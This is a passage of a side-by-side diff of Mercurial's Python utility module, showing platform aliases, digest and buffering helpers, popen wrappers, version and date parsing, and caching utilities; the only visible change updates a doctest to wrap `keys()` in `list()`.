74 xmlrpclib = pycompat.xmlrpclib
75
75
76 # workaround for win32mbcs
76 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
78
78
79 def isatty(fp):
79 def isatty(fp):
80 try:
80 try:
81 return fp.isatty()
81 return fp.isatty()
82 except AttributeError:
82 except AttributeError:
83 return False
83 return False
84
84
85 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # buffering
87 # buffering
88 if isatty(stdout):
88 if isatty(stdout):
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90
90
91 if pycompat.osname == 'nt':
91 if pycompat.osname == 'nt':
92 from . import windows as platform
92 from . import windows as platform
93 stdout = platform.winstdout(stdout)
93 stdout = platform.winstdout(stdout)
94 else:
94 else:
95 from . import posix as platform
95 from . import posix as platform
96
96
97 _ = i18n._
97 _ = i18n._
98
98
99 bindunixsocket = platform.bindunixsocket
99 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
100 cachestat = platform.cachestat
101 checkexec = platform.checkexec
101 checkexec = platform.checkexec
102 checklink = platform.checklink
102 checklink = platform.checklink
103 copymode = platform.copymode
103 copymode = platform.copymode
104 executablepath = platform.executablepath
104 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
105 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
106 explainexit = platform.explainexit
107 findexe = platform.findexe
107 findexe = platform.findexe
108 gethgcmd = platform.gethgcmd
108 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
109 getuser = platform.getuser
110 getpid = os.getpid
110 getpid = os.getpid
111 groupmembers = platform.groupmembers
111 groupmembers = platform.groupmembers
112 groupname = platform.groupname
112 groupname = platform.groupname
113 hidewindow = platform.hidewindow
113 hidewindow = platform.hidewindow
114 isexec = platform.isexec
114 isexec = platform.isexec
115 isowner = platform.isowner
115 isowner = platform.isowner
116 listdir = osutil.listdir
116 listdir = osutil.listdir
117 localpath = platform.localpath
117 localpath = platform.localpath
118 lookupreg = platform.lookupreg
118 lookupreg = platform.lookupreg
119 makedir = platform.makedir
119 makedir = platform.makedir
120 nlinks = platform.nlinks
120 nlinks = platform.nlinks
121 normpath = platform.normpath
121 normpath = platform.normpath
122 normcase = platform.normcase
122 normcase = platform.normcase
123 normcasespec = platform.normcasespec
123 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
124 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
125 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
126 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
127 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
128 pconvert = platform.pconvert
129 poll = platform.poll
129 poll = platform.poll
130 popen = platform.popen
130 popen = platform.popen
131 posixfile = platform.posixfile
131 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
132 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
133 readpipe = platform.readpipe
134 rename = platform.rename
134 rename = platform.rename
135 removedirs = platform.removedirs
135 removedirs = platform.removedirs
136 samedevice = platform.samedevice
136 samedevice = platform.samedevice
137 samefile = platform.samefile
137 samefile = platform.samefile
138 samestat = platform.samestat
138 samestat = platform.samestat
139 setbinary = platform.setbinary
139 setbinary = platform.setbinary
140 setflags = platform.setflags
140 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
141 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
142 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
143 spawndetached = platform.spawndetached
144 split = platform.split
144 split = platform.split
145 sshargs = platform.sshargs
145 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
147 statisexec = platform.statisexec
148 statislink = platform.statislink
148 statislink = platform.statislink
149 testpid = platform.testpid
149 testpid = platform.testpid
150 umask = platform.umask
150 umask = platform.umask
151 unlink = platform.unlink
151 unlink = platform.unlink
152 username = platform.username
152 username = platform.username
153
153
154 try:
154 try:
155 recvfds = osutil.recvfds
155 recvfds = osutil.recvfds
156 except AttributeError:
156 except AttributeError:
157 pass
157 pass
158 try:
158 try:
159 setprocname = osutil.setprocname
159 setprocname = osutil.setprocname
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162
162
163 # Python compatibility
163 # Python compatibility
164
164
165 _notset = object()
165 _notset = object()
166
166
167 # disable Python's problematic floating point timestamps (issue4836)
167 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
168 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
169 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
170 os.stat_float_times(False)
171
171
172 def safehasattr(thing, attr):
172 def safehasattr(thing, attr):
173 return getattr(thing, attr, _notset) is not _notset
173 return getattr(thing, attr, _notset) is not _notset
174
174
175 def bytesinput(fin, fout, *args, **kwargs):
175 def bytesinput(fin, fout, *args, **kwargs):
176 sin, sout = sys.stdin, sys.stdout
176 sin, sout = sys.stdin, sys.stdout
177 try:
177 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 finally:
180 finally:
181 sys.stdin, sys.stdout = sin, sout
181 sys.stdin, sys.stdout = sin, sout
182
182
183 def bitsfrom(container):
183 def bitsfrom(container):
184 bits = 0
184 bits = 0
185 for bit in container:
185 for bit in container:
186 bits |= bit
186 bits |= bit
187 return bits
187 return bits
188
188
189 # python 2.6 still have deprecation warning enabled by default. We do not want
189 # python 2.6 still have deprecation warning enabled by default. We do not want
190 # to display anything to standard user so detect if we are running test and
190 # to display anything to standard user so detect if we are running test and
191 # only use python deprecation warning in this case.
191 # only use python deprecation warning in this case.
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 if _dowarn:
193 if _dowarn:
194 # explicitly unfilter our warning for python 2.7
194 # explicitly unfilter our warning for python 2.7
195 #
195 #
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203
203
204 def nouideprecwarn(msg, version, stacklevel=1):
204 def nouideprecwarn(msg, version, stacklevel=1):
205 """Issue an python native deprecation warning
205 """Issue an python native deprecation warning
206
206
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 """
208 """
209 if _dowarn:
209 if _dowarn:
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 " update your code.)") % version
211 " update your code.)") % version
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213
213
214 DIGESTS = {
214 DIGESTS = {
215 'md5': hashlib.md5,
215 'md5': hashlib.md5,
216 'sha1': hashlib.sha1,
216 'sha1': hashlib.sha1,
217 'sha512': hashlib.sha512,
217 'sha512': hashlib.sha512,
218 }
218 }
219 # List of digest types from strongest to weakest
219 # List of digest types from strongest to weakest
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221
221
222 for k in DIGESTS_BY_STRENGTH:
222 for k in DIGESTS_BY_STRENGTH:
223 assert k in DIGESTS
223 assert k in DIGESTS
224
224
225 class digester(object):
225 class digester(object):
226 """helper to compute digests.
226 """helper to compute digests.
227
227
228 This helper can be used to compute one or more digests given their name.
228 This helper can be used to compute one or more digests given their name.
229
229
230 >>> d = digester([b'md5', b'sha1'])
230 >>> d = digester([b'md5', b'sha1'])
231 >>> d.update(b'foo')
231 >>> d.update(b'foo')
232 >>> [k for k in sorted(d)]
232 >>> [k for k in sorted(d)]
233 ['md5', 'sha1']
233 ['md5', 'sha1']
234 >>> d[b'md5']
234 >>> d[b'md5']
235 'acbd18db4cc2f85cedef654fccc4a4d8'
235 'acbd18db4cc2f85cedef654fccc4a4d8'
236 >>> d[b'sha1']
236 >>> d[b'sha1']
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 >>> digester.preferred([b'md5', b'sha1'])
238 >>> digester.preferred([b'md5', b'sha1'])
239 'sha1'
239 'sha1'
240 """
240 """
241
241
242 def __init__(self, digests, s=''):
242 def __init__(self, digests, s=''):
243 self._hashes = {}
243 self._hashes = {}
244 for k in digests:
244 for k in digests:
245 if k not in DIGESTS:
245 if k not in DIGESTS:
246 raise Abort(_('unknown digest type: %s') % k)
246 raise Abort(_('unknown digest type: %s') % k)
247 self._hashes[k] = DIGESTS[k]()
247 self._hashes[k] = DIGESTS[k]()
248 if s:
248 if s:
249 self.update(s)
249 self.update(s)
250
250
251 def update(self, data):
251 def update(self, data):
252 for h in self._hashes.values():
252 for h in self._hashes.values():
253 h.update(data)
253 h.update(data)
254
254
255 def __getitem__(self, key):
255 def __getitem__(self, key):
256 if key not in DIGESTS:
256 if key not in DIGESTS:
257 raise Abort(_('unknown digest type: %s') % k)
257 raise Abort(_('unknown digest type: %s') % k)
258 return self._hashes[key].hexdigest()
258 return self._hashes[key].hexdigest()
259
259
260 def __iter__(self):
260 def __iter__(self):
261 return iter(self._hashes)
261 return iter(self._hashes)
262
262
263 @staticmethod
263 @staticmethod
264 def preferred(supported):
264 def preferred(supported):
265 """returns the strongest digest type in both supported and DIGESTS."""
265 """returns the strongest digest type in both supported and DIGESTS."""
266
266
267 for k in DIGESTS_BY_STRENGTH:
267 for k in DIGESTS_BY_STRENGTH:
268 if k in supported:
268 if k in supported:
269 return k
269 return k
270 return None
270 return None
271
271
272 class digestchecker(object):
272 class digestchecker(object):
273 """file handle wrapper that additionally checks content against a given
273 """file handle wrapper that additionally checks content against a given
274 size and digests.
274 size and digests.
275
275
276 d = digestchecker(fh, size, {'md5': '...'})
276 d = digestchecker(fh, size, {'md5': '...'})
277
277
278 When multiple digests are given, all of them are validated.
278 When multiple digests are given, all of them are validated.
279 """
279 """
280
280
281 def __init__(self, fh, size, digests):
281 def __init__(self, fh, size, digests):
282 self._fh = fh
282 self._fh = fh
283 self._size = size
283 self._size = size
284 self._got = 0
284 self._got = 0
285 self._digests = dict(digests)
285 self._digests = dict(digests)
286 self._digester = digester(self._digests.keys())
286 self._digester = digester(self._digests.keys())
287
287
288 def read(self, length=-1):
288 def read(self, length=-1):
289 content = self._fh.read(length)
289 content = self._fh.read(length)
290 self._digester.update(content)
290 self._digester.update(content)
291 self._got += len(content)
291 self._got += len(content)
292 return content
292 return content
293
293
294 def validate(self):
294 def validate(self):
295 if self._size != self._got:
295 if self._size != self._got:
296 raise Abort(_('size mismatch: expected %d, got %d') %
296 raise Abort(_('size mismatch: expected %d, got %d') %
297 (self._size, self._got))
297 (self._size, self._got))
298 for k, v in self._digests.items():
298 for k, v in self._digests.items():
299 if v != self._digester[k]:
299 if v != self._digester[k]:
300 # i18n: first parameter is a digest name
300 # i18n: first parameter is a digest name
301 raise Abort(_('%s mismatch: expected %s, got %s') %
301 raise Abort(_('%s mismatch: expected %s, got %s') %
302 (k, v, self._digester[k]))
302 (k, v, self._digester[k]))
303
303
304 try:
304 try:
305 buffer = buffer
305 buffer = buffer
306 except NameError:
306 except NameError:
307 def buffer(sliceable, offset=0, length=None):
307 def buffer(sliceable, offset=0, length=None):
308 if length is not None:
308 if length is not None:
309 return memoryview(sliceable)[offset:offset + length]
309 return memoryview(sliceable)[offset:offset + length]
310 return memoryview(sliceable)[offset:]
310 return memoryview(sliceable)[offset:]
311
311
312 closefds = pycompat.osname == 'posix'
312 closefds = pycompat.osname == 'posix'
313
313
314 _chunksize = 4096
314 _chunksize = 4096
315
315
316 class bufferedinputpipe(object):
316 class bufferedinputpipe(object):
317 """a manually buffered input pipe
317 """a manually buffered input pipe
318
318
319 Python will not let us use buffered IO and lazy reading with 'polling' at
319 Python will not let us use buffered IO and lazy reading with 'polling' at
320 the same time. We cannot probe the buffer state and select will not detect
320 the same time. We cannot probe the buffer state and select will not detect
321 that data are ready to read if they are already buffered.
321 that data are ready to read if they are already buffered.
322
322
323 This class let us work around that by implementing its own buffering
323 This class let us work around that by implementing its own buffering
324 (allowing efficient readline) while offering a way to know if the buffer is
324 (allowing efficient readline) while offering a way to know if the buffer is
325 empty from the output (allowing collaboration of the buffer with polling).
325 empty from the output (allowing collaboration of the buffer with polling).
326
326
327 This class lives in the 'util' module because it makes use of the 'os'
327 This class lives in the 'util' module because it makes use of the 'os'
328 module from the python stdlib.
328 module from the python stdlib.
329 """
329 """
330
330
331 def __init__(self, input):
331 def __init__(self, input):
332 self._input = input
332 self._input = input
333 self._buffer = []
333 self._buffer = []
334 self._eof = False
334 self._eof = False
335 self._lenbuf = 0
335 self._lenbuf = 0
336
336
337 @property
337 @property
338 def hasbuffer(self):
338 def hasbuffer(self):
339 """True is any data is currently buffered
339 """True is any data is currently buffered
340
340
341 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
342 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
343 return bool(self._buffer)
343 return bool(self._buffer)
344
344
345 @property
345 @property
346 def closed(self):
346 def closed(self):
347 return self._input.closed
347 return self._input.closed
348
348
349 def fileno(self):
349 def fileno(self):
350 return self._input.fileno()
350 return self._input.fileno()
351
351
352 def close(self):
352 def close(self):
353 return self._input.close()
353 return self._input.close()
354
354
355 def read(self, size):
355 def read(self, size):
356 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
357 self._fillbuffer()
357 self._fillbuffer()
358 return self._frombuffer(size)
358 return self._frombuffer(size)
359
359
360 def readline(self, *args, **kwargs):
360 def readline(self, *args, **kwargs):
361 if 1 < len(self._buffer):
361 if 1 < len(self._buffer):
362 # this should not happen because both read and readline end with a
362 # this should not happen because both read and readline end with a
363 # _frombuffer call that collapse it.
363 # _frombuffer call that collapse it.
364 self._buffer = [''.join(self._buffer)]
364 self._buffer = [''.join(self._buffer)]
365 self._lenbuf = len(self._buffer[0])
365 self._lenbuf = len(self._buffer[0])
366 lfi = -1
366 lfi = -1
367 if self._buffer:
367 if self._buffer:
368 lfi = self._buffer[-1].find('\n')
368 lfi = self._buffer[-1].find('\n')
369 while (not self._eof) and lfi < 0:
369 while (not self._eof) and lfi < 0:
370 self._fillbuffer()
370 self._fillbuffer()
371 if self._buffer:
371 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
373 size = lfi + 1
373 size = lfi + 1
374 if lfi < 0: # end of file
374 if lfi < 0: # end of file
375 size = self._lenbuf
375 size = self._lenbuf
376 elif 1 < len(self._buffer):
376 elif 1 < len(self._buffer):
377 # we need to take previous chunks into account
377 # we need to take previous chunks into account
378 size += self._lenbuf - len(self._buffer[-1])
378 size += self._lenbuf - len(self._buffer[-1])
379 return self._frombuffer(size)
379 return self._frombuffer(size)
380
380
381 def _frombuffer(self, size):
381 def _frombuffer(self, size):
382 """return at most 'size' data from the buffer
382 """return at most 'size' data from the buffer
383
383
384 The data are removed from the buffer."""
384 The data are removed from the buffer."""
385 if size == 0 or not self._buffer:
385 if size == 0 or not self._buffer:
386 return ''
386 return ''
387 buf = self._buffer[0]
387 buf = self._buffer[0]
388 if 1 < len(self._buffer):
388 if 1 < len(self._buffer):
389 buf = ''.join(self._buffer)
389 buf = ''.join(self._buffer)
390
390
391 data = buf[:size]
391 data = buf[:size]
392 buf = buf[len(data):]
392 buf = buf[len(data):]
393 if buf:
393 if buf:
394 self._buffer = [buf]
394 self._buffer = [buf]
395 self._lenbuf = len(buf)
395 self._lenbuf = len(buf)
396 else:
396 else:
397 self._buffer = []
397 self._buffer = []
398 self._lenbuf = 0
398 self._lenbuf = 0
399 return data
399 return data
400
400
401 def _fillbuffer(self):
401 def _fillbuffer(self):
402 """read data to the buffer"""
402 """read data to the buffer"""
403 data = os.read(self._input.fileno(), _chunksize)
403 data = os.read(self._input.fileno(), _chunksize)
404 if not data:
404 if not data:
405 self._eof = True
405 self._eof = True
406 else:
406 else:
407 self._lenbuf += len(data)
407 self._lenbuf += len(data)
408 self._buffer.append(data)
408 self._buffer.append(data)
409
409
410 def popen2(cmd, env=None, newlines=False):
410 def popen2(cmd, env=None, newlines=False):
411 # Setting bufsize to -1 lets the system decide the buffer size.
411 # Setting bufsize to -1 lets the system decide the buffer size.
412 # The default for bufsize is 0, meaning unbuffered. This leads to
412 # The default for bufsize is 0, meaning unbuffered. This leads to
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 close_fds=closefds,
415 close_fds=closefds,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 universal_newlines=newlines,
417 universal_newlines=newlines,
418 env=env)
418 env=env)
419 return p.stdin, p.stdout
419 return p.stdin, p.stdout
420
420
421 def popen3(cmd, env=None, newlines=False):
421 def popen3(cmd, env=None, newlines=False):
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 return stdin, stdout, stderr
423 return stdin, stdout, stderr
424
424
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 close_fds=closefds,
427 close_fds=closefds,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 stderr=subprocess.PIPE,
429 stderr=subprocess.PIPE,
430 universal_newlines=newlines,
430 universal_newlines=newlines,
431 env=env)
431 env=env)
432 return p.stdin, p.stdout, p.stderr, p
432 return p.stdin, p.stdout, p.stderr, p
433
433
434 def version():
434 def version():
435 """Return version information if available."""
435 """Return version information if available."""
436 try:
436 try:
437 from . import __version__
437 from . import __version__
438 return __version__.version
438 return __version__.version
439 except ImportError:
439 except ImportError:
440 return 'unknown'
440 return 'unknown'
441
441
442 def versiontuple(v=None, n=4):
442 def versiontuple(v=None, n=4):
443 """Parses a Mercurial version string into an N-tuple.
443 """Parses a Mercurial version string into an N-tuple.
444
444
445 The version string to be parsed is specified with the ``v`` argument.
445 The version string to be parsed is specified with the ``v`` argument.
446 If it isn't defined, the current Mercurial version string will be parsed.
446 If it isn't defined, the current Mercurial version string will be parsed.
447
447
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 returned values:
449 returned values:
450
450
451 >>> v = b'3.6.1+190-df9b73d2d444'
451 >>> v = b'3.6.1+190-df9b73d2d444'
452 >>> versiontuple(v, 2)
452 >>> versiontuple(v, 2)
453 (3, 6)
453 (3, 6)
454 >>> versiontuple(v, 3)
454 >>> versiontuple(v, 3)
455 (3, 6, 1)
455 (3, 6, 1)
456 >>> versiontuple(v, 4)
456 >>> versiontuple(v, 4)
457 (3, 6, 1, '190-df9b73d2d444')
457 (3, 6, 1, '190-df9b73d2d444')
458
458
459 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
459 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
461
461
462 >>> v = b'3.6'
462 >>> v = b'3.6'
463 >>> versiontuple(v, 2)
463 >>> versiontuple(v, 2)
464 (3, 6)
464 (3, 6)
465 >>> versiontuple(v, 3)
465 >>> versiontuple(v, 3)
466 (3, 6, None)
466 (3, 6, None)
467 >>> versiontuple(v, 4)
467 >>> versiontuple(v, 4)
468 (3, 6, None, None)
468 (3, 6, None, None)
469
469
470 >>> v = b'3.9-rc'
470 >>> v = b'3.9-rc'
471 >>> versiontuple(v, 2)
471 >>> versiontuple(v, 2)
472 (3, 9)
472 (3, 9)
473 >>> versiontuple(v, 3)
473 >>> versiontuple(v, 3)
474 (3, 9, None)
474 (3, 9, None)
475 >>> versiontuple(v, 4)
475 >>> versiontuple(v, 4)
476 (3, 9, None, 'rc')
476 (3, 9, None, 'rc')
477
477
478 >>> v = b'3.9-rc+2-02a8fea4289b'
478 >>> v = b'3.9-rc+2-02a8fea4289b'
479 >>> versiontuple(v, 2)
479 >>> versiontuple(v, 2)
480 (3, 9)
480 (3, 9)
481 >>> versiontuple(v, 3)
481 >>> versiontuple(v, 3)
482 (3, 9, None)
482 (3, 9, None)
483 >>> versiontuple(v, 4)
483 >>> versiontuple(v, 4)
484 (3, 9, None, 'rc+2-02a8fea4289b')
484 (3, 9, None, 'rc+2-02a8fea4289b')
485 """
485 """
486 if not v:
486 if not v:
487 v = version()
487 v = version()
488 parts = remod.split('[\+-]', v, 1)
488 parts = remod.split('[\+-]', v, 1)
489 if len(parts) == 1:
489 if len(parts) == 1:
490 vparts, extra = parts[0], None
490 vparts, extra = parts[0], None
491 else:
491 else:
492 vparts, extra = parts
492 vparts, extra = parts
493
493
494 vints = []
494 vints = []
495 for i in vparts.split('.'):
495 for i in vparts.split('.'):
496 try:
496 try:
497 vints.append(int(i))
497 vints.append(int(i))
498 except ValueError:
498 except ValueError:
499 break
499 break
500 # (3, 6) -> (3, 6, None)
500 # (3, 6) -> (3, 6, None)
501 while len(vints) < 3:
501 while len(vints) < 3:
502 vints.append(None)
502 vints.append(None)
503
503
504 if n == 2:
504 if n == 2:
505 return (vints[0], vints[1])
505 return (vints[0], vints[1])
506 if n == 3:
506 if n == 3:
507 return (vints[0], vints[1], vints[2])
507 return (vints[0], vints[1], vints[2])
508 if n == 4:
508 if n == 4:
509 return (vints[0], vints[1], vints[2], extra)
509 return (vints[0], vints[1], vints[2], extra)
510
510
511 # used by parsedate
511 # used by parsedate
512 defaultdateformats = (
512 defaultdateformats = (
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 '%Y-%m-%dT%H:%M', # without seconds
514 '%Y-%m-%dT%H:%M', # without seconds
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 '%Y-%m-%dT%H%M', # without seconds
516 '%Y-%m-%dT%H%M', # without seconds
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 '%Y-%m-%d %H:%M', # without seconds
518 '%Y-%m-%d %H:%M', # without seconds
519 '%Y-%m-%d %H%M%S', # without :
519 '%Y-%m-%d %H%M%S', # without :
520 '%Y-%m-%d %H%M', # without seconds
520 '%Y-%m-%d %H%M', # without seconds
521 '%Y-%m-%d %I:%M:%S%p',
521 '%Y-%m-%d %I:%M:%S%p',
522 '%Y-%m-%d %H:%M',
522 '%Y-%m-%d %H:%M',
523 '%Y-%m-%d %I:%M%p',
523 '%Y-%m-%d %I:%M%p',
524 '%Y-%m-%d',
524 '%Y-%m-%d',
525 '%m-%d',
525 '%m-%d',
526 '%m/%d',
526 '%m/%d',
527 '%m/%d/%y',
527 '%m/%d/%y',
528 '%m/%d/%Y',
528 '%m/%d/%Y',
529 '%a %b %d %H:%M:%S %Y',
529 '%a %b %d %H:%M:%S %Y',
530 '%a %b %d %I:%M:%S%p %Y',
530 '%a %b %d %I:%M:%S%p %Y',
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 '%b %d %H:%M:%S %Y',
532 '%b %d %H:%M:%S %Y',
533 '%b %d %I:%M:%S%p %Y',
533 '%b %d %I:%M:%S%p %Y',
534 '%b %d %H:%M:%S',
534 '%b %d %H:%M:%S',
535 '%b %d %I:%M:%S%p',
535 '%b %d %I:%M:%S%p',
536 '%b %d %H:%M',
536 '%b %d %H:%M',
537 '%b %d %I:%M%p',
537 '%b %d %I:%M%p',
538 '%b %d %Y',
538 '%b %d %Y',
539 '%b %d',
539 '%b %d',
540 '%H:%M:%S',
540 '%H:%M:%S',
541 '%I:%M:%S%p',
541 '%I:%M:%S%p',
542 '%H:%M',
542 '%H:%M',
543 '%I:%M%p',
543 '%I:%M%p',
544 )
544 )
545
545
546 extendeddateformats = defaultdateformats + (
546 extendeddateformats = defaultdateformats + (
547 "%Y",
547 "%Y",
548 "%Y-%m",
548 "%Y-%m",
549 "%b",
549 "%b",
550 "%b %Y",
550 "%b %Y",
551 )
551 )
552
552
553 def cachefunc(func):
553 def cachefunc(func):
554 '''cache the result of function calls'''
554 '''cache the result of function calls'''
555 # XXX doesn't handle keywords args
555 # XXX doesn't handle keywords args
556 if func.__code__.co_argcount == 0:
556 if func.__code__.co_argcount == 0:
557 cache = []
557 cache = []
558 def f():
558 def f():
559 if len(cache) == 0:
559 if len(cache) == 0:
560 cache.append(func())
560 cache.append(func())
561 return cache[0]
561 return cache[0]
562 return f
562 return f
563 cache = {}
563 cache = {}
564 if func.__code__.co_argcount == 1:
564 if func.__code__.co_argcount == 1:
565 # we gain a small amount of time because
565 # we gain a small amount of time because
566 # we don't need to pack/unpack the list
566 # we don't need to pack/unpack the list
567 def f(arg):
567 def f(arg):
568 if arg not in cache:
568 if arg not in cache:
569 cache[arg] = func(arg)
569 cache[arg] = func(arg)
570 return cache[arg]
570 return cache[arg]
571 else:
571 else:
572 def f(*args):
572 def f(*args):
573 if args not in cache:
573 if args not in cache:
574 cache[args] = func(*args)
574 cache[args] = func(*args)
575 return cache[args]
575 return cache[args]
576
576
577 return f
577 return f
578
578
579 class sortdict(collections.OrderedDict):
579 class sortdict(collections.OrderedDict):
580 '''a simple sorted dictionary
580 '''a simple sorted dictionary
581
581
582 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
582 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
583 >>> d2 = d1.copy()
583 >>> d2 = d1.copy()
584 >>> d2
584 >>> d2
585 sortdict([('a', 0), ('b', 1)])
585 sortdict([('a', 0), ('b', 1)])
586 >>> d2.update([(b'a', 2)])
586 >>> d2.update([(b'a', 2)])
587 >>> d2.keys() # should still be in last-set order
587 >>> list(d2.keys()) # should still be in last-set order
588 ['b', 'a']
588 ['b', 'a']
589 '''
589 '''
590
590
591 def __setitem__(self, key, value):
591 def __setitem__(self, key, value):
592 if key in self:
592 if key in self:
593 del self[key]
593 del self[key]
594 super(sortdict, self).__setitem__(key, value)
594 super(sortdict, self).__setitem__(key, value)
595
595
596 if pycompat.ispypy:
596 if pycompat.ispypy:
597 # __setitem__() isn't called as of PyPy 5.8.0
597 # __setitem__() isn't called as of PyPy 5.8.0
598 def update(self, src):
598 def update(self, src):
599 if isinstance(src, dict):
599 if isinstance(src, dict):
600 src = src.iteritems()
600 src = src.iteritems()
601 for k, v in src:
601 for k, v in src:
602 self[k] = v
602 self[k] = v
603
603
604 class transactional(object):
604 class transactional(object):
605 """Base class for making a transactional type into a context manager."""
605 """Base class for making a transactional type into a context manager."""
606 __metaclass__ = abc.ABCMeta
606 __metaclass__ = abc.ABCMeta
607
607
608 @abc.abstractmethod
608 @abc.abstractmethod
609 def close(self):
609 def close(self):
610 """Successfully closes the transaction."""
610 """Successfully closes the transaction."""
611
611
612 @abc.abstractmethod
612 @abc.abstractmethod
613 def release(self):
613 def release(self):
614 """Marks the end of the transaction.
614 """Marks the end of the transaction.
615
615
616 If the transaction has not been closed, it will be aborted.
616 If the transaction has not been closed, it will be aborted.
617 """
617 """
618
618
619 def __enter__(self):
619 def __enter__(self):
620 return self
620 return self
621
621
622 def __exit__(self, exc_type, exc_val, exc_tb):
622 def __exit__(self, exc_type, exc_val, exc_tb):
623 try:
623 try:
624 if exc_type is None:
624 if exc_type is None:
625 self.close()
625 self.close()
626 finally:
626 finally:
627 self.release()
627 self.release()
628
628
629 @contextlib.contextmanager
629 @contextlib.contextmanager
630 def acceptintervention(tr=None):
630 def acceptintervention(tr=None):
631 """A context manager that closes the transaction on InterventionRequired
631 """A context manager that closes the transaction on InterventionRequired
632
